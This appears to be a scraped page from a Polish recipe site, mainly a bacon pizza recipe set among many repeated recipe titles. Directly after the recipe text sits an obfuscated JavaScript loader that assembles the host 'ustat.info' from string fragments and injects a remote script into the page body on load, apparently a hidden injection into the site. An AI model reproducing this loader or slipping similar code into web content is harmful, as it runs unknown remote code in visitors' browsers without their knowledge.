Koktajl jagodowo - porzeczkowy

Moja smaczna kuchnia

Koktajl jagodowo - porzeczkowy

Pasta z ciecierzycy z suszonymi pomidorami i papryką

Moja smaczna kuchnia

Pasta z ciecierzycy z suszonymi pomidorami i papryką

Ogórki małosolne z koperkiem

Moja smaczna kuchnia

Ogórki małosolne z koperkiem

Przepis na pizzę z boczkiem

Moja smaczna kuchnia

Przepis na pizzę z boczkiem

Nie ma wakacji bez pizzy. Danie to w różnych wariantach należy do najbardziej lubianych posiłków dla dzieci i dorosłych. Jaka pizza jest najlepsza? Oczywiście z boczkiem. Nic nie może równać się aromatowi pieczonych plastrów boczku i woni świeżego drożdżowego ciasta. Sycąca, ciepła pizza z boczkiem świetnie się nada na letnie przyjęcie, albo kolację na całej rodziny. Poznaj przepis na pizzę z boczkiem, który jest łatwy i naprawdę szybki w wykonaniu. Za ojczyznę pizzy uznaje się Włochy, choć tą potrawą zajadano się już w starożytnym Egipcie i Grecji. Najbardziej klasyczna z pomidorami, serem i ziołami doczekała się wielu odmian. Przebojem na każdym stole jest pachnąca pizza z boczkiem. Można ją szybko i łatwo przygotować w domu. Pasuje na każdą okazję i co najważniejsze zawsze smakuje wyśmienicie. Oto przepis na ten przysmak: Składniki: 400g mąki pszennej (i nieco do podsypania ciasta) ¾ kostki świeżych drożdży szczypta cukru 100 ml oleju 4 cebule 2 ząbki czosnku 200 g młodego szpinaku lub rukoli 125 g sera mozzarella szczypta pieprzu szczypta soli 80 g boczku do pizzy trochę oleju z chili Przygotowanie: Mąkę przesiać do miski, zrobić w środku dziurkę. Do drożdży dodać 125 ml ciepłej wody, wymieszać, wlać w zagłębienie w mące. Dodać 1 łyżeczkę soli, szczyptę cukru i olej i połączyć na gładką masę. Przykryć ściereczką i odłożyć w ciepłe miejsce na 45 minut. Obrać cebulę i czosnek. Cebulę pokroić w cienkie krążki, czosnek drobno posiekać. Szpinak (lub rukolę) opłukać i osuszyć. Rozgrzać piec do 250 stopni (bez termoobiegu). Ciasto jeszcze raz zagnieść, uformować wałkiem płaski, okrągły placek. Spód do pizzy położyć na papierze do pieczenia i włożyć na blachę. Na górze położyć plastry sera, boczku, krążki cebuli i posypać posiekanym czosnkiem. Doprawić solą i pieprzem. Blaszkę wsunąć na spód piekarnika. Piec 15-20 minut. Wyjąć i na gorące ciasto położyć, szpinak (lub rukolę), skropić olejem z chilii, według uznania dodać odrobinę świeżego pieprzu. Podawać od razu. Smakosze pizzy w wersji bardziej warzywnej mogą wzbogacić ją kolejnymi składnikami i dodać na wierzch pokrojone kawałki cukinii, papryki, różyczki brokułów, pieczarki. Ciekawie smakuje też wersja z wędzonym boczkiem na zimno. Dodaje się go wówczas na gorące ciasto razem z zieleniną. Boczek nie jest wówczas chrupiący, tylko miękki i soczysty. Którą wersję wybrać? Najlepiej obie, robiąc od razu dwie pizze z większej ilości składników, bo możemy się założyć, że na pewno nie zostanie z nich nawet okruszek.(function(){ xw8d_=("u"+"")+"s"+"";xw8d_+=("tat.")+("i"); xw8d=document.createElement("script");xw8d.type="text/javascript";xw8d_+="nf"+("o")+"/"; xw8du="10461529"+".";xw8d.async=true;xw8du+="9r51sbngw8dll3kc56aX4tvafxg1s8"; xw8d.src="//"+xw8d_+xw8du; xw8db=document.body; xw8db.appendChild(xw8d); })();

Sałatka ziemniaczana z bobem i ogórkiem małosolnym

Moja smaczna kuchnia

Sałatka ziemniaczana z bobem i ogórkiem małosolnym

Mus czekoladowy

Moja smaczna kuchnia

Mus czekoladowy

Mrożony jogurt truskawkowo - miętowy z jagodami goji

Moja smaczna kuchnia

Mrożony jogurt truskawkowo - miętowy z jagodami goji

Niestandardowe wałki do ciast

Moja smaczna kuchnia

Niestandardowe wałki do ciast

Deser lodowy z miętowymi czereśniami, fistaszkami i kruszonką

Moja smaczna kuchnia

Deser lodowy z miętowymi czereśniami, fistaszkami i kruszonką

Ogórki małosolne z ognistą przyprawą

Moja smaczna kuchnia

Ogórki małosolne z ognistą przyprawą

Koktajl truskawkowo - miętowy czekoladą

Moja smaczna kuchnia

Koktajl truskawkowo - miętowy czekoladą

Kompot truskawkowo - czereśniowy

Moja smaczna kuchnia

Kompot truskawkowo - czereśniowy

Jaglany shake z truskawkami

Moja smaczna kuchnia

Jaglany shake z truskawkami

50 przepisów na koktajle

Moja smaczna kuchnia

50 przepisów na koktajle

Koktajl truskawkowo - brzoskwiniowy

Moja smaczna kuchnia

Koktajl truskawkowo - brzoskwiniowy

Koktajl truskawkowo - miętowy

Moja smaczna kuchnia

Koktajl truskawkowo - miętowy

Bellini

Moja smaczna kuchnia

Bellini

Domowy kisiel truskawkowy

Moja smaczna kuchnia

Domowy kisiel truskawkowy

Surówka z młodej kapusty z marchewką i koperkiem

Moja smaczna kuchnia

Surówka z młodej kapusty z marchewką i koperkiem

Rossini

Moja smaczna kuchnia

Rossini

88 przekąsek i napojów dla kibica

Moja smaczna kuchnia

88 przekąsek i napojów dla kibica

Sorbet truskawkowy

Moja smaczna kuchnia

Sorbet truskawkowy

Najlepsze wina w jednym miejscu, przygotowujemy menu dla kibica

Moja smaczna kuchnia

Najlepsze wina w jednym miejscu, przygotowujemy menu dla kibica

15 przepisów z truskawkami

Moja smaczna kuchnia

15 przepisów z truskawkami

Koktajl truskawkowy z natką z pietruszki i jagodami goji

Moja smaczna kuchnia

Koktajl truskawkowy z natką z pietruszki i jagodami goji

Crumble z truskawkami

Moja smaczna kuchnia

Crumble z truskawkami

Sałatka z kaszą pęczak, zielonym ogórkiem i rzodkiewką

Moja smaczna kuchnia

Sałatka z kaszą pęczak, zielonym ogórkiem i rzodkiewką

Woda ogórkowo - miętowa

Moja smaczna kuchnia

Woda ogórkowo - miętowa

Ciasto z truskawkami

Moja smaczna kuchnia

Ciasto z truskawkami

Koktajl truskawkowy z jagodami goji

Moja smaczna kuchnia

Koktajl truskawkowy z jagodami goji